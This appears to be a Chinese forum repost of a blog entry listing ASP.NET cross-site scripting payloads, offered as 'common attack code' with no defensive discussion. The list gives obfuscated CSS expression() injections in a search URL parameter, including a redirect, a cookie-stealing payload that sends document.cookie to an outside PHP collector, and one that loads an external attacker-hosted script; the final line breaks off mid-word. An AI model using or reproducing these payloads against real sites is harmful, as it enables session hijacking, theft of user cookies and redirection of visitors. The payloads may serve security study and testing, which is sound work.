找回密码
 会员注册
查看: 125|回复: 0

Asp.net跨站脚本攻击XSS实例分享

[复制链接]

250

主题

1

回帖

819

积分

管理员

积分
819
发表于 2024-2-29 08:10:40 | 显示全部楼层 |阅读模式


Asp.net跨站脚本攻击XSS实例分享


常用攻击代码:

  1. http://target/vuln-search.aspx?term=
  2. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  3. Redirection Attack
  4. http://target/vuln-search.aspx?term=
  5. </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")>
  6. Cookie stealing
  7. http://target/vuln-search.aspx?term=
  8. </XSS/*-*/STYLE=xss:e/**/xpression(window.location=
  9. "http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)>
  10. Unrestricted HTML injection from external '.js' file
  11. http://target/vuln-search.aspx?term=
  12. </XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
  13. (document.createElement("script")))>
  14. </XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>
  15. where 'xss.js&
复制代码

来源:https://blog.csdn.net/yangzhenping/article/details/49024615
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 会员注册

本版积分规则

QQ|手机版|心飞设计-版权所有:微度网络信息技术服务中心 ( 鲁ICP备17032091号-12 )|网站地图

GMT+8, 2024-12-27 15:15 , Processed in 0.797340 second(s), 26 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表